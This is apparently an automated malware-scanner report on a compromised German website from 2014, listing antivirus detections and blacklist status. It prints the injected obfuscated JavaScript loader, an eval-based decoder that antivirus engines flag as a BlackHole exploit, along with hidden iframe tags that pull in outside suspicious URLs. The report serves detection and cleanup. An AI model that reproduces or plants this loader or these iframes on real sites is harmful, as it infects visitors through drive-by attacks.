Malware Scanner report for der-euromat.de

Malicious/Suspicious/Total urls checked: 2/0/3
2 pages have malicious code. See details below.

Blacklists: Found
The website is marked by Google as suspicious.
The website "der-euromat.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 1/2/3
1 malicious and 2 suspicious iframes found. See details below.

Deface / Content modification: OK

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=der-euromat.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request / Server response / Status
http://der-euromat.de/
200 OK
Content-Length: 46896
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

urzok="spl"+"i"+"t";vbh=window;tpvdfz=(1)?"0x":"123";euo=(5-3-1);try{--(document["b"+"ody"])}catch(yedzr){kvhke=false;try{}catch(aas){kvhke=21;}
if(1){ipbnh="0:0:60:5d:17:1f:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:6a:39:70:4b:58:5e:45:58:64:5c:1f:1e:59:66:5b:70:1e:20:52:27:54:20:72:4:0:0:0:60:5d:69:58:64:5c:69:1f:20:32:4:0:0:74:17:5c:63:6a:5c:17:72:4:0:0:0:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:19:33:60:5d:69:58:64:5c:17:6a
...[1656 bytes skipped]...

Antivirus reports:

Avast                 JS:Decode-BLJ [Trj]
Ad-Aware              JS:Exploit.BlackHole.HB
Ikarus                Trojan.JS.Quidvetis
nProtect              JS:Exploit.BlackHole.HB
TrendMicro-HouseCall  TROJ_GEN.F47V1104
Comodo                Exploit.JS.Expack.G
Emsisoft              JS:Exploit.BlackHole.HB (B)
McAfee-GW-Edition     Heuristic.BehavesLike.JS.Infected.A
DrWeb                 Exploit.BlackHole.12
Microsoft             Exploit:JS/Blacole.NX
MicroWorld-eScan      JS:Exploit.BlackHole.HB
Fortinet              JS/Kryptik.AOW!tr
McAfee                JS/Exploit-Blacole.ht
NANO-Antivirus        Trojan.Script.Expack.bvvxsj
F-Secure              JS:Exploit.BlackHole.HB
AVG                   JS/Exploit
Norman                Quidvetis.A
GData                 JS:Exploit.BlackHole.HB
ESET-NOD32            JS/Kryptik.AOW
BitDefender           JS:Exploit.BlackHole.HB

Hidden iFrame found.
size: 0x0     
src: http://network-backoffice.de/counter/counter.php?uid=671&lid=1303&refer=

<iframe width='0px' height='0px' scrolling='no' marginheight='0' marginwidth='0' frameborder='0' src='http://network-backoffice.de/counter/counter.php?uid=671&lid=1303&refer="+document.referrer+"&lp="+lp+"'>

Malicious iFrame found. The same iFrame was found in 5 websites.
size: 1x1     
src: http://lfmonline.de/test/test.php
This URL is marked by Google as suspicious

<iframe src="http://lfmonline.de/test/test.php" width="1" height="1" frameborder="0">

Hidden iFrame found.
size: 0x0     
src: http://network-backoffice.de/counter/counter.php?uid=671&lid=1303&refer=&lp=

<iframe width='0px' height='0px' scrolling='no' marginheight='0' marginwidth='0' frameborder='0' src='http://network-backoffice.de/counter/counter.php?uid=671&lid=1303&refer=&lp="+lp+"'>

http://der-euromat.de/impressum.html
200 OK
Content-Length: 22299
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

urzok="spl"+"i"+"t";vbh=window;tpvdfz=(1)?"0x":"123";euo=(5-3-1);try{--(document["b"+"ody"])}catch(yedzr){kvhke=false;try{}catch(aas){kvhke=21;}
if(1){ipbnh="0:0:60:5d:17:1f:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:6a:39:70:4b:58:5e:45:58:64:5c:1f:1e:59:66:5b:70:1e:20:52:27:54:20:72:4:0:0:0:60:5d:69:58:64:5c:69:1f:20:32:4:0:0:74:17:5c:63:6a:5c:17:72:4:0:0:0:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:19:33:60:5d:69:58:64:5c:17:6a:69:5a:34:1e:5f:6b:6b:67:31:26:26:63:5d:64:66
... 1111 bytes are skipped ...
e:20:32:5d:25:6a:5c:6b:38:6b:6b:69:60:59:6c:6b:5c:1f:1e:5f:5c:60:5e:5f:6b:1e:23:1e:28:27:27:1e:20:32:4:0:0:0:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:6a:39:70:4b:58:5e:45:58:64:5c:1f:1e:59:66:5b:70:1e:20:52:27:54:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:5d:20:32:4:0:0:74"[urzok](":");}vbh=ipbnh;vrvhhn=[];for(mbrtp=22-20-2;-mbrtp+588!=0;mbrtp+=1){ighrr=mbrtp;if((0x19==031))vrvhhn+=String.fromCharCode(eval(tpvdfz+vbh[1*ighrr])+0xa-euo);}iblzo=eval;if(Math.ceil(5.5)===6)iblzo(vrvhhn)}

Antivirus reports:

Avast                 JS:Decode-BLJ [Trj]
Ad-Aware              JS:Exploit.BlackHole.HB
Ikarus                Trojan.JS.Quidvetis
nProtect              JS:Exploit.BlackHole.HB
TrendMicro-HouseCall  TROJ_GEN.F47V1104
Comodo                Exploit.JS.Expack.G
Emsisoft              JS:Exploit.BlackHole.HB (B)
McAfee-GW-Edition     Heuristic.BehavesLike.JS.Infected.A
DrWeb                 Exploit.BlackHole.12
Microsoft             Exploit:JS/Blacole.NX
MicroWorld-eScan      JS:Exploit.BlackHole.HB
Fortinet              JS/Kryptik.AOW!tr
McAfee                JS/Exploit-Blacole.ht
NANO-Antivirus        Trojan.Script.Expack.bvvxsj
F-Secure              JS:Exploit.BlackHole.HB
AVG                   JS/Exploit
Norman                Quidvetis.A
GData                 JS:Exploit.BlackHole.HB
ESET-NOD32            JS/Kryptik.AOW
BitDefender           JS:Exploit.BlackHole.HB

http://der-euromat.de/test404page.js
404 Not Found
Content-Length: 276
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: der-euromat.de

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Jul 2014 01:31:38 GMT
Accept-Ranges: bytes
ETag: "4a406a-b730-4eac14cdd4580"
Server: Apache
Vary: Accept-Encoding
Content-Length: 46896
Content-Type: text/html
Last-Modified: Sat, 09 Nov 2013 16:50:46 GMT

...46896 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: der-euromat.de
Referer: http://www.google.com/search?q=der-euromat.de

Result:
The result is similar to the first query. There are no suspicious redirects found.